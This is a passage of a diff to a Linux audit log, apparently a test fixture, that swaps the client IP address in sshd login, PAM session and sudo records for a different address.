grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077072.590:443): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1324 suid=0 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=CRYPTO_KEY_USER msg=audit(1481077072.591:444): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1327 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077072.591:445): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1327 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRED_ACQ msg=audit(1481077072.592:446): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_LOGIN msg=audit(1481077072.611:447): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_START msg=audit(1481077072.612:448): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077074.324:449): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1327 suid=1000 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=USER_END msg=audit(1481077074.326:450): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_close grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRED_DISP msg=audit(1481077074.327:451): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_END msg=audit(1481077074.329:452): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_LOGOUT msg=audit(1481077074.329:453): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077074.329:454): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1324 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077074.329:455): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1324 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=CRYPTO_KEY_USER msg=audit(1481077083.100:456): pid=1340 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1340 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077083.100:457): pid=1340 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1340 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_SESSION msg=audit(1481077083.118:458): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_SESSION msg=audit(1481077083.118:459): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077083.282:460): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63931 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=USER_AUTH msg=audit(1481077083.282:461): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63931 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_ACCT msg=audit(1481077083.287:462): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077083.288:463): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077083.289:464): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? 
addr=96.241.146.97 terminal=ssh res=success' -type=CRED_ACQ msg=audit(1481077083.290:465): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' +type=USER_ROLE_CHANGE msg=audit(1481077072.564:441): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_START msg=audit(1481077072.589:442): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077072.590:443): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1324 suid=0 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077072.591:444): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1327 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
res=success' +type=CRYPTO_KEY_USER msg=audit(1481077072.591:445): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1327 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRED_ACQ msg=audit(1481077072.592:446): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_LOGIN msg=audit(1481077072.611:447): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_START msg=audit(1481077072.612:448): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077074.324:449): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1327 suid=1000 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
res=success' +type=USER_END msg=audit(1481077074.326:450): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_close grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRED_DISP msg=audit(1481077074.327:451): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_END msg=audit(1481077074.329:452): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_LOGOUT msg=audit(1481077074.329:453): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077074.329:454): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1324 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077074.329:455): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1324 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
res=success' +type=CRYPTO_KEY_USER msg=audit(1481077083.100:456): pid=1340 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1340 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077083.100:457): pid=1340 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1340 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_SESSION msg=audit(1481077083.118:458): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_SESSION msg=audit(1481077083.118:459): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077083.282:460): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63931 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
res=success' +type=USER_AUTH msg=audit(1481077083.282:461): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63931 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_ACCT msg=audit(1481077083.287:462): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077083.288:463): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077083.289:464): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? 
addr=216.160.83.61 terminal=ssh res=success' +type=CRED_ACQ msg=audit(1481077083.290:465): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' type=LOGIN msg=audit(1481077083.290:466): pid=1339 uid=0 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 old-auid=4294967295 auid=1000 old-ses=4294967295 ses=3 res=1 -type=USER_ROLE_CHANGE msg=audit(1481077083.358:467): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_START msg=audit(1481077083.388:468): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077083.389:469): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1339 suid=0 rport=63931 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077083.390:470): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1342 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=CRYPTO_KEY_USER msg=audit(1481077083.390:471): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1342 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRED_ACQ msg=audit(1481077083.391:472): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_LOGIN msg=audit(1481077083.414:473): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/0 res=success' -type=USER_START msg=audit(1481077083.414:474): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/0 res=success' +type=USER_ROLE_CHANGE msg=audit(1481077083.358:467): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_START msg=audit(1481077083.388:468): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' 
+type=CRYPTO_KEY_USER msg=audit(1481077083.389:469): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1339 suid=0 rport=63931 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077083.390:470): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1342 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077083.390:471): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1342 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRED_ACQ msg=audit(1481077083.391:472): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_LOGIN msg=audit(1481077083.414:473): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/0 res=success' +type=USER_START msg=audit(1481077083.414:474): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/0 res=success' type=USER_CMD msg=audit(1481077231.363:475): pid=1382 uid=1000 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='cwd="/home/some_user" 
cmd=2E2F676F2D6175646974202D636F6E6669672061756469742E79616D6C terminal=pts/0 res=success' type=CRED_ACQ msg=audit(1481077231.363:476): pid=1382 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success' type=USER_START msg=audit(1481077231.364:477): pid=1382 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_keyinit,pam_limits acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success' 
@@ -829,30 +829,30 @@ type=EXECVE msg=audit(1481077253.941:486): argc=3 a0="/usr/sbin/sshd" a1="-D" a2 type=CWD msg=audit(1481077253.941:486): cwd="/" type=PATH msg=audit(1481077253.941:486): item=0 name="/usr/sbin/sshd" inode=17367919 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:sshd_exec_t:s0 objtype=NORMAL type=PATH msg=audit(1481077253.941:486): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=16778495 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL -type=CRYPTO_KEY_USER msg=audit(1481077253.949:487): pid=1398 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1398 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077253.949:488): pid=1398 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1398 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_SESSION msg=audit(1481077253.969:489): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_SESSION msg=audit(1481077253.969:490): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=USER_AUTH msg=audit(1481077254.134:491): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63973 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077254.134:492): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63973 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077253.949:487): pid=1398 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1398 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077253.949:488): pid=1398 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1398 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_SESSION msg=audit(1481077253.969:489): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
